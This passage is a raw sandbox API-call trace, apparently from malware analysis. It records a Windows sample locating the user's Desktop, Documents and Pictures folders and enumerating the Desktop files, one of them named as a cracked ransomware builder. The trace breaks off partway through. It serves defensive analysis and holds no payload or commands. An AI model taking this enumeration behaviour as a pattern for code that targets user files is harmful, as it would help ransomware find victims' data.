pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0063.042] CoTaskMemFree (pv=0x99f930) [0063.078] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x6fdae8 | out: phkResult=0x6fdae8*=0x0) returned 0x2 [0063.079] RegCloseKey (hKey=0xffffffff80000002) returned 0x0 [0063.090] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x105, lpBuffer=0x6fe5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0063.092] CoTaskMemAlloc (cb=0x20c) returned 0x99f930 [0063.092] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x99f930 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0063.093] CoTaskMemFree (pv=0x99f930) [0063.093] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x105, lpBuffer=0x6fe5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0063.093] CoTaskMemAlloc (cb=0x20c) returned 0x99d730 [0063.093] SHGetFolderPathW (in: hwnd=0x0, csidl=39, hToken=0x0, dwFlags=0x0, pszPath=0x99d730 | out: pszPath="C:\\Users\\FD1HVy\\Pictures") returned 0x0 [0063.094] CoTaskMemFree (pv=0x99d730) [0063.094] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures", nBufferLength=0x105, lpBuffer=0x6fe5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures", lpFilePart=0x0) returned 0x18 [0063.163] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0063.168] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0063.168] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8a1c27e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x8a1c27e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0063.168] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0063.170] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0063.230] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0063.235] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe600, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0063.238] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.txt", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.254] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8a1c27e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x8a1c27e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9beb40 [0063.256] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x8a1c27e, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x8a1c27e, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.256] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0063.256] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0063.257] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0063.257] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0063.257] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0063.257] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0063.257] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99d0b80, ftCreationTime.dwHighDateTime=0x1d5dff8, ftLastAccessTime.dwLowDateTime=0xf99d0b80, ftLastAccessTime.dwHighDateTime=0x1d5dff8, ftLastWriteTime.dwLowDateTime=0xf7d34800, ftLastWriteTime.dwHighDateTime=0x1d5dff8, nFileSizeHigh=0x0, nFileSizeLow=0xf0b23, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe", cAlternateFileName="ALIENR~1.EXE")) returned 1 [0063.257] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0063.257] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0063.258] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c346c0, ftCreationTime.dwHighDateTime=0x1d5c79c, ftLastAccessTime.dwLowDateTime=0xc13b08a0, ftLastAccessTime.dwHighDateTime=0x1d5d463, ftLastWriteTime.dwLowDateTime=0xc13b08a0, ftLastWriteTime.dwHighDateTime=0x1d5d463, nFileSizeHigh=0x0, nFileSizeLow=0x4b78, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif", cAlternateFileName="")) returned 1 [0063.258] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0063.258] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0063.258] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0063.258] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0063.259] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0063.259] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0063.259] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0063.259] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2942aad0, ftCreationTime.dwHighDateTime=0x1d5d5cb, ftLastAccessTime.dwLowDateTime=0x3520ea30, ftLastAccessTime.dwHighDateTime=0x1d5d358, ftLastWriteTime.dwLowDateTime=0x3520ea30, ftLastWriteTime.dwHighDateTime=0x1d5d358, nFileSizeHigh=0x0, nFileSizeLow=0x10253, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif", cAlternateFileName="J51YJL~1.GIF")) returned 1 [0063.259] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x38e7c380, ftCreationTime.dwHighDateTime=0x1d5d648, ftLastAccessTime.dwLowDateTime=0xe93bdd60, ftLastAccessTime.dwHighDateTime=0x1d5d4c8, ftLastWriteTime.dwLowDateTime=0xe93bdd60, ftLastWriteTime.dwHighDateTime=0x1d5d4c8, nFileSizeHigh=0x0, nFileSizeLow=0x9417, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi", cAlternateFileName="")) returned 1 [0063.259] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b79f760, ftCreationTime.dwHighDateTime=0x1d5d23a, ftLastAccessTime.dwLowDateTime=0x3cfbbf90, ftLastAccessTime.dwHighDateTime=0x1d5c9db, ftLastWriteTime.dwLowDateTime=0x3cfbbf90, ftLastWriteTime.dwHighDateTime=0x1d5c9db, nFileSizeHigh=0x0, nFileSizeLow=0xfb6b, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi", cAlternateFileName="J_GUXI~1.AVI")) returned 1 [0063.260] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b501110, ftCreationTime.dwHighDateTime=0x1d5d535, ftLastAccessTime.dwLowDateTime=0xa751ce0, ftLastAccessTime.dwHighDateTime=0x1d5cba4, ftLastWriteTime.dwLowDateTime=0xa751ce0, ftLastWriteTime.dwHighDateTime=0x1d5cba4, nFileSizeHigh=0x0, nFileSizeLow=0x454f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4", cAlternateFileName="")) returned 1 [0063.260] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d8d490, ftCreationTime.dwHighDateTime=0x1d5cd75, ftLastAccessTime.dwLowDateTime=0x2c2b1a50, ftLastAccessTime.dwHighDateTime=0x1d5ccef, ftLastWriteTime.dwLowDateTime=0x2c2b1a50, ftLastWriteTime.dwHighDateTime=0x1d5ccef, nFileSizeHigh=0x0, nFileSizeLow=0x2d9a, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif", cAlternateFileName="MCQMPN~1.GIF")) returned 1 [0063.260] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0063.260] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0063.260] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e6a2940, ftCreationTime.dwHighDateTime=0x1d5d2ed, ftLastAccessTime.dwLowDateTime=0xbbd52910, ftLastAccessTime.dwHighDateTime=0x1d5c822, ftLastWriteTime.dwLowDateTime=0xbbd52910, ftLastWriteTime.dwHighDateTime=0x1d5c822, nFileSizeHigh=0x0, nFileSizeLow=0xb5e3, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4", cAlternateFileName="NYVW1N~1.MP4")) returned 1 [0063.260] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0063.260] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0063.261] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88b6f190, ftCreationTime.dwHighDateTime=0x1d5d631, ftLastAccessTime.dwLowDateTime=0x1cebe780, ftLastAccessTime.dwHighDateTime=0x1d5d024, ftLastWriteTime.dwLowDateTime=0x1cebe780, ftLastWriteTime.dwHighDateTime=0x1d5d024, nFileSizeHigh=0x0, nFileSizeLow=0x7bd2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi", cAlternateFileName="TAB3I0~1.AVI")) returned 1 [0063.261] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0063.261] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0063.261] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb84cebd0, ftCreationTime.dwHighDateTime=0x1d5d2da, ftLastAccessTime.dwLowDateTime=0xc11d8380, ftLastAccessTime.dwHighDateTime=0x1d5d10b, ftLastWriteTime.dwLowDateTime=0xc11d8380, ftLastWriteTime.dwHighDateTime=0x1d5d10b, nFileSizeHigh=0x0, nFileSizeLow=0x3443, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg", cAlternateFileName="W3NCKP~1.JPG")) returned 1 [0063.261] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb154e40, ftCreationTime.dwHighDateTime=0x1d5ce80, ftLastAccessTime.dwLowDateTime=0x71f710b0, ftLastAccessTime.dwHighDateTime=0x1d5d263, ftLastWriteTime.dwLowDateTime=0x71f710b0, ftLastWriteTime.dwHighDateTime=0x1d5d263, nFileSizeHigh=0x0, nFileSizeLow=0xa113, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4", cAlternateFileName="")) returned 1 [0063.261] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2aa462e0, ftCreationTime.dwHighDateTime=0x1d5d5b9, ftLastAccessTime.dwLowDateTime=0x1e92de00, ftLastAccessTime.dwHighDateTime=0x1d5c853, ftLastWriteTime.dwLowDateTime=0x1e92de00, ftLastWriteTime.dwHighDateTime=0x1d5c853, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yi TyUTEx1dVRHalW", cAlternateFileName="YITYUT~1")) returned 1 [0063.261] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 1 [0063.262] FindNextFileW (in: hFindFile=0x9beb40, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc92ca540, ftCreationTime.dwHighDateTime=0x1d5c8c0, ftLastAccessTime.dwLowDateTime=0xc2425e30, ftLastAccessTime.dwHighDateTime=0x1d5c9e9, ftLastWriteTime.dwLowDateTime=0xc2425e30, ftLastWriteTime.dwHighDateTime=0x1d5c9e9, nFileSizeHigh=0x0, nFileSizeLow=0xcf42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZvWDNly8ss.csv", cAlternateFileName="ZVWDNL~1.CSV")) returned 0 [0063.262] FindClose (in: hFindFile=0x9beb40 | out: hFindFile=0x9beb40) returned 1 [0063.262] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.txt", lpFindFileData=0x6fe810 | out: lpFindFileData=0x6fe810*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0063.262] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\ED 0nXQ VIkUvYr6\\*", lpFindFileData=0x6fe790 | out: 